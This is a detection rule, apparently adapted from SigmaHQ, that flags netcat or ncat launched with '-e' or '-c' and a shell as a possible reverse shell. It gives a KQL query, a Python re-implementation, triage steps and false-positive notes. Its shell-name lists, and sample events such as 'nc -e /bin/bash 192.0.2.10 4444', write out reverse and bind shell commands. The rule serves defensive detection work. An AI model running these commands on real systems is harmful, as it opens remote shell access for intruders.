Detects execution of netcat with the "-e" flag followed by common shells. This could be a sign of a potential reverse shell setup.
/ncat Shell Execution /nc Shell Execution
LOLBINs Unix Execution
https://github.com/SigmaHQ/sigma/blob/822f0b3d92b41a7a2021c1ec52f0053d764695e1/rules/linux/process_creation/proc_creation_lnx_netcat_reverse_shell.yml
https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
https://www.infosecademy.com/netcat-reverse-shells/
{{ mitre("T1059.004")}}
Data Source(s): Command, Process
let selection_flags = dynamic([' -c ',' -e ' ]);
let selection_shell = dynamic([' ash', ' bash', ' bsh', ' csh', ' ksh', ' pdksh', ' sh', ' tcsh', '/bin/ash', '/bin/bash', '/bin/bsh', '/bin/csh', '/bin/ksh', '/bin/pdksh', '/bin/sh', '/bin/tcsh', '/bin/zsh', '$IFSash', '$IFSbash', '$IFSbsh', '$IFScsh', '$IFSksh', '$IFSpdksh', '$IFSsh', '$IFStcsh', '$IFSzsh']);
DeviceProcessEvents
| where ActionType == "ProcessCreated"
| where FolderPath endswith "/ncat" or FolderPath endswith "/nc" //selection_nc
| where ProcessCommandLine has_any (selection_flags)
| where ProcessCommandLine has_any (selection_shell)
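To check the rule's logic offline, the following Python re-implements the three stages of the KQL above (binary path, flag, shell token) and runs them over constructed DeviceProcessEvents-style records. This is an added example, not part of the original rule or the SigmaHQ source; the event dictionaries, the 192.0.2.0/24 documentation addresses and the helper names `matches_netcat_reverse_shell` and `triage_hits` are assumptions made for the illustration.

```python
"""Offline check of the netcat reverse-shell detection logic (added example)."""

# Same selection lists as the KQL rule.
SELECTION_FLAGS = [" -c ", " -e "]
SELECTION_SHELL = [
    " ash", " bash", " bsh", " csh", " ksh", " pdksh", " sh", " tcsh",
    "/bin/ash", "/bin/bash", "/bin/bsh", "/bin/csh", "/bin/ksh", "/bin/pdksh",
    "/bin/sh", "/bin/tcsh", "/bin/zsh",
    "$IFSash", "$IFSbash", "$IFSbsh", "$IFScsh", "$IFSksh", "$IFSpdksh",
    "$IFSsh", "$IFStcsh", "$IFSzsh",
]


def matches_netcat_reverse_shell(event: dict) -> bool:
    """Return True when an event satisfies every stage of the KQL rule."""
    if event.get("ActionType") != "ProcessCreated":
        return False
    # selection_nc: the image is nc or ncat (KQL endswith is case-insensitive).
    path = event.get("FolderPath", "").lower()
    if not (path.endswith("/ncat") or path.endswith("/nc")):
        return False
    # has_any is case-insensitive; a lowercase substring check approximates it here.
    cmd = event.get("ProcessCommandLine", "").lower()
    if not any(flag in cmd for flag in SELECTION_FLAGS):
        return False
    return any(shell.lower() in cmd for shell in SELECTION_SHELL)


def triage_hits(events: list) -> list:
    """Return (FolderPath, ProcessCommandLine) for every event the rule flags,
    i.e. the fields an analyst verifies in the triage steps below."""
    return [
        (e["FolderPath"], e["ProcessCommandLine"])
        for e in events
        if matches_netcat_reverse_shell(e)
    ]


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    # Matches: nc with -e and a shell path (the pattern the rule targets).
    {"ActionType": "ProcessCreated", "FolderPath": "/usr/bin/nc",
     "ProcessCommandLine": "nc -e /bin/bash 192.0.2.10 4444"},
    # Benign port check: nc, but neither flag nor shell token is present.
    {"ActionType": "ProcessCreated", "FolderPath": "/usr/bin/nc",
     "ProcessCommandLine": "nc -zv 192.0.2.20 443"},
    # Matches via the ncat image name.
    {"ActionType": "ProcessCreated", "FolderPath": "/usr/bin/ncat",
     "ProcessCommandLine": "ncat -l -p 4444 -e /bin/sh"},
    # Wrong binary: bash -c carries the flag but is not nc/ncat.
    {"ActionType": "ProcessCreated", "FolderPath": "/bin/bash",
     "ProcessCommandLine": "bash -c 'id'"},
]

if __name__ == "__main__":
    for path, cmd in triage_hits(SAMPLE_EVENTS):
        print(f"ALERT {path}: {cmd}")
```

Two of the four constructed events are flagged; the port check and the plain bash invocation are not, which is the behaviour the KQL's path filter and flag filter are meant to give.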
- Validate the use of netcat in the environment and confirm with the administrator team.
- Verify the account, timestamp, and command lines executed, and whether the activity was approved.
- Legitimate admin activities using netcat
Version 1.0 (date: 15/03/2024)